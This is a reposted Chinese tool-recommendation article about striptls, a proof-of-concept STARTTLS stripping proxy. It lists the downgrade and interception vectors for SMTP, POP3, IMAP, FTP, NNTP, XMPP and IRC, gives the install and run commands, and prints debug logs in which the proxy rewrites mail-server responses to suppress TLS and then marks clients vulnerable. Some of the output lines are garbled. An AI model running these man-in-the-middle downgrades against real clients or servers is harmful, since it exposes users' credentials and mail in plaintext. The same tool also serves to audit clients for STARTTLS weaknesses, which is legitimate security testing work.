工具推荐:striptls端口剥离攻击的POC实现
程序员文章站
2022-04-06 23:12:49
STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。
striptls是一款端口剥...
STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。
striptls是一款端口剥离攻击的POC实现
SMTP
SMTP.StripFromCapabilities - server response capability patch
SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
SMTP.StripWithTemporaryError
SMTP.StripWithError
SMTP.ProtocolDowngradeStripExtendedMode
SMTP.InjectCommand
POP3
POP3.StripFromCapabilities
POP3.StripWithError
POP3.UntrustedIntercept
IMAP
IMAP.StripFromCapabilities
IMAP.StripWithError
IMAP.UntrustedIntercept
IMAP.ProtocolDowngradeToV2
FTP
FTP.StripFromCapabilities
FTP.StripWithError
FTP.UntrustedIntercept
NNTP
NNTP.StripFromCapabilities
NNTP.StripWithError
NNTP.UntrustedIntercept
XMPP
XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept
ACAP (untested)
ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept
IRC
IRC.StripFromCapabilities
IRC.StripWithError
IRC.UntrustedIntercept
IRC.StripWithNotRegistered
IRC.StripCAPWithNotregistered
IRC.StripWithSilentDrop
结果:
- [*] client: 127.0.0.1
- [Vulnerable!]
- [Vulnerable!]
- [ ]
- [Vulnerable!]
- [*] client: 192.168.139.1
- [Vulnerable!]
- [Vulnerable!]
- [Vulnerable!] striptls.stripfromcapabilities at 0x7f08319a67a0> striptls.stripinboundtls at 0x7f08319a6808> striptls.stripwitherror at 0xffd4614c> striptls.stripfromcapabilities at 0xffd316bc> striptls.stripwithtemporaryerror at 0xffd4611c> striptls.stripwithinvalidresponsecode at 0xffd3138c>
#> python -m striptls --help # from pip/setup.py#> python striptls --help # from source / root folderUsage: striptls [options]
example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options:
-h, --help show this help message and exit -v, --verbose make lots of noise [default]
-l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:]
-r REMOTE, --remote=REMOTE
remote target ip:port to forward sessions to
-k KEY, --key=KEY SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem]
-x VECTORS, --vectors=VECTORS
Comma separated list of vectors. Use 'ALL' (default)
to select all vectors. Available vectors:
FTP.StripFromCapabilities, FTP.StripWithError,
FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
IMAP.StripWithError, IMAP.UntrustedIntercept,
NNTP.StripFromCapabilities, NNTP.StripWithError,
NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
POP3.StripWithError, POP3.UntrustedIntercept,
SMTP.ProtocolDowngradeStripExtendedMode,
SMTP.StripFromCapabilities, SMTP.StripWithError,
SMTP.StripWithInvalidResponseCode,
SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
XMPP.UntrustedIntercept [default: ALL]
1.从pip安装
#> pip install striptls
2.从源安装
#> setup.py install
示例:
inbound outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
smtp-client striptls remote/target
本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25
在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl + C来中止审核并打印结果。
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO - ready.
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:5222 , proto: XMPP):
2016-02-02 22:11:56,276 - INFO - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO - client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG -
2016-02-02 22:12:09,759 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG - [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING - terminated.
2016-02-02 22:12:13,056 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO - client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG -
2016-02-02 22:12:14,197 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG - [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING - terminated.
2016-02-02 22:12:16,649 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO - client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG -
2016-02-02 22:12:17,760 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG - [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING - terminated.
2016-02-02 22:12:20,071 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO - client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG -
2016-02-02 22:12:21,181 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG - [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING - terminated.
2016-02-02 22:12:23,665 - WARNING - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO - -- audit results --
2016-02-02 22:12:23,666 - INFO - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO - [Vulnerable!]
2016-02-02 22:12:23,666 - INFO - [Vulnerable!]
2016-02-02 22:12:23,666 - INFO - [ ]
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] @b.com> @b.com> @b.com>
除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。